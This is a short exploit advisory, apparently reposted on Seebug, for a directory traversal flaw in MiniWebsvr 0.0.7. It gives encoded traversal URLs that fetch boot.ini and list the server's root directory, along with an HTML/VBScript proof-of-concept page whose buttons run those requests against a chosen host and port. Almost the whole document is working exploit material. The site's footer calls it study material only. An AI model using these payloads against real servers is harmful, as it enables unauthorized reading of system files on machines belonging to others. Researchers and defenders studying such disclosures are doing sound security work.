<pre> <code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">------------------------------------------------------------- <b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b> url: http://miniwebsvr.sourceforge.net/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../ ------------------------------------------------------------- Host Port <input type=text name=txtIP value = \"localhost\"> <input type=text name=txtPort value = \"8080\"> <input language=VBScript onclick=GetBoot() type=button value=\"Click to get boot.ini\"> <input language=VBScript onclick=BrowseMe() type=button value=\"Click to browse\"> <script language=\'vbscript\'> Sub GetBoot on error resume next document.location = \"http://\" + txtIP.value + \":\" + txtPort.value + \"/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini\" end sub Sub BrowseMe on error resume next document.location = \"http://\" + txtIP.value + \":\" + txtPort.value + \"/%5C..%5C..%5C..%5C..%5C..%5C../\" end sub </script> </span></span> </code></pre>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论